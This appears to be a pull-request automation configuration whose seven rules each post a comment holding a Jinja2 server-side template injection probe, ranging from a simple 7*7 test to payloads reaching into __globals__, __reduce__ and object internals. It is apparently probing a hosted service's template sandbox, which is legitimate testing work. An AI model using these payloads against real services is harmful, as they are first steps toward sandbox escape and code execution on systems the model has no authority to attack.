pull_request_rules:
  # === COMMENT TESTS — renders template as PR comment ===
  - name: ssti-comment-1-math
    conditions:
      - base=main
      - head~=^test-comment-1-math-
    actions:
      comment:
        message: |
          SSTI-C1: {{ 7*7 }}

  - name: ssti-comment-2-attformat
    conditions:
      - base=main
      - head~=^test-comment-2-attformat-
    actions:
      comment:
        message: |
          SSTI-C2: {{ ''|attr('format')('{0.__class__}') }}

  - name: ssti-comment-3-percent
    conditions:
      - base=main
      - head~=^test-comment-3-percent-
    actions:
      comment:
        message: |
          SSTI-C3: {{ "%d%%20" % 42 }}

  - name: ssti-comment-4-self
    conditions:
      - base=main
      - head~=^test-comment-4-self-
    actions:
      comment:
        message: |
          SSTI-C4: {{ self.__dict__ }}

  - name: ssti-comment-5-globals
    conditions:
      - base=main
      - head~=^test-comment-5-globals-
    actions:
      comment:
        message: |
          SSTI-C5: {{ lipsum|attr('__globals__') }}

  - name: ssti-comment-6-reduce
    conditions:
      - base=main
      - head~=^test-comment-6-reduce-
    actions:
      comment:
        message: |
          SSTI-C6: {{ "".__class__|attr("__reduce__") }}

  - name: ssti-comment-7-getsection
    conditions:
      - base=main
      - head~=^test-comment-7-getsection-
    actions:
      comment:
        message: |
          SSTI-C7: {{ body|get_section(".*", "NO-MATCH") }}
